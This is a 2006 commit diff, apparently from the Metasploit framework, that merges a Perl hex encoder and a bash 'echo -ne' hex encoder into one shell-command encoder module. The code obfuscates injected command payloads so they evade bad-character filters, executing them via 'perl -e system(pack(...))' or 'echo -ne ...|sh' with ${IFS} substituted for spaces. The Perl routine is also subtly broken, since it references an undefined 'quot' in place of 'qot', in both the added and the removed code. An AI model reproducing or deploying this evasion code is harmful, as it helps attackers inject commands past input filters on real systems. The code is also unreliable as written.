Merged them into one

git-svn-id: file:///home/svn/incoming/trunk@3376 4d416f70-5f16-0410-b530-b9f4589650da
2006-01-16 02:32:30 +00:00 · 2006-01-16 02:32:30 +00:00 · 4a14fa7e02
parent 9c5f4776b8
commit 4a14fa7e02
3 changed files with 85 additions and 139 deletions
--- a/modules/encoders/cmd/generic_sh.rb
+++ b/modules/encoders/cmd/generic_sh.rb
@ -32,6 +32,91 @@ class GenericSh < Msf::Encoder
 		return buf
 	end
 	#
 	# Uses the perl command to hex encode the command string
 	#
 	def encode_block_perl(state, buf)
 		hex = buf.unpack("H*")	
 		cmd = 'perl -e '
 		qot = ',-:.=+!@#$%^&'
 		# Find a quoting character to use
 		state.badchars.unpack('C*') { |c| quot.delete(c.chr) }
 		# Throw an error if we ran out of quotes
 		raise RuntimeError if qot.length == 0
 		sep = qot[0].chr
 		# Convert spaces to IFS...
 		if (state.badchars.include?(" "))
 			cmd.gsub!(/\s/, '${IFS}')
 		end
 		# Can we use single quotes to enclose the command string?
 		if (state.badchars.include?("'"))
 			if (state.badchars.match(/\(|\)/))
 				# No paranthesis...
 				raise RuntimeError
 			end
 			cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)"
 		else
 			if (state.badchars.match(/\(|\)/))
 				if (state.badchars.include?(" "))
 					# No spaces allowed, no paranthesis, give up...
 					raise RuntimeError
 				end
 				cmd << "'system pack qq#{sep}H*#{sep},#{hex}'"
 			else
 				cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'"
 			end
 		end
 		return cmd
 	end
 	#
 	# Uses bash's echo -ne command to hex encode the command string
 	#
 	def encode_block_bash_echo(state, buf)
 		hex = ''
 		# Can we use single quotes to enclose the echo arguments?
 		if (state.badchars.include?("'"))
 			hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join
 		else
 			hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'"
 		end
 		# Are pipe characters restricted?
 		if (state.badchars.include?("|"))
 			# How about backticks?
 			if (state.badchars.include?("`"))
 				raise RuntimeError
 			else
 				buf = "`echo -ne #{hex}`"
 			end
 		else
 			buf = "echo -ne #{hex}|sh"
 		end
 		# Remove spaces from the command string
 		if (state.badchars.include?(" "))
 			buf.gsub!(/\s/, '${IFS}')
 		end
 		return buf
 	end	
 end
 end end end
--- a/modules/encoders/cmd/hex_bash_echo.rb
+++ b/modules/encoders/cmd/hex_bash_echo.rb
@ -1,63 +0,0 @@
 require 'msf/core'
 module Msf
 module Encoders
 module Cmd
 class HexBashEcho < Msf::Encoder
 	def initialize
 		super(
 			'Name'             => 'BASH echo -e Hex Encoding',
 			'Version'          => '$Revision$',
 			'Description'      => %q{
 				This encoder uses the "-e" option available in recent
 			versions of BASH to encode the command string. This 
 			encoder will only work on recent Linux distributions or 
 			situations where a new version of BASH is used to inject
 			the supplied command string.
 			},
 			'Author'           => 'hdm',
 			'Platform'         => 'linux',
 			'Arch'             => ARCH_CMD)
 	end
 	#
 	# Encodes the payload
 	#
 	def encode_block(state, buf)
 		hex = ''
 		# Can we use single quotes to enclose the echo arguments?
 		if (state.badchars.include?("'"))
 			hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join
 		else
 			hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'"
 		end
 		# Are pipe characters restricted?
 		if (state.badchars.include?("|"))
 			# How about backticks?
 			if (state.badchars.include?("`"))
 				raise RuntimeError
 			else
 				buf = "`echo -ne #{hex}`"
 			end
 		else
 			buf = "echo -ne #{hex}|sh"
 		end
 		# Remove spaces from the command string
 		if (state.badchars.include?(" "))
 			buf.gsub!(/\s/, '${IFS}')
 		end
 		return buf
 	end
 end
 end end end
--- a/modules/encoders/cmd/hex_perl.rb
+++ b/modules/encoders/cmd/hex_perl.rb
@ -1,76 +0,0 @@
 require 'msf/core'
 module Msf
 module Encoders
 module Cmd
 class HexPerl < Msf::Encoder
 	def initialize
 		super(
 			'Name'             => 'PERL Hex Encoding',
 			'Version'          => '$Revision$',
 			'Description'      => %q{
 				This encoder uses the PERL interpreter to decode
 			and execute a command supplied in hex format. This encoder
 			should work on most Unix systems that have PERL version
 			5.0 or above.
 			},
 			'Author'           => 'hdm',
 			'Arch'             => ARCH_CMD)
 	end
 	#
 	# Encodes the payload
 	#
 	def encode_block(state, buf)
 		hex = buf.unpack("H*")	
 		cmd = 'perl -e '
 		qot = ',-:.=+!@#$%^&'
 		# Find a quoting character to use
 		state.badchars.unpack('C*') { |c| quot.delete(c.chr) }
 		# Throw an error if we ran out of quotes
 		raise RuntimeError if qot.length == 0
 		sep = qot[0].chr
 		# Convert spaces to IFS...
 		if (state.badchars.include?(" "))
 			cmd.gsub!(/\s/, '${IFS}')
 		end
 		# Can we use single quotes to enclose the command string?
 		if (state.badchars.include?("'"))
 			if (state.badchars.match(/\(|\)/))
 				# No paranthesis...
 				raise RuntimeError
 			end
 			cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)"
 		else
 			if (state.badchars.match(/\(|\)/))
 				if (state.badchars.include?(" "))
 					# No spaces allowed, no paranthesis, give up...
 					raise RuntimeError
 				end
 				cmd << "'system pack qq#{sep}H*#{sep},#{hex}'"
 			else
 				cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'"
 			end
 		end
 		return cmd
 	end
 end
 end end end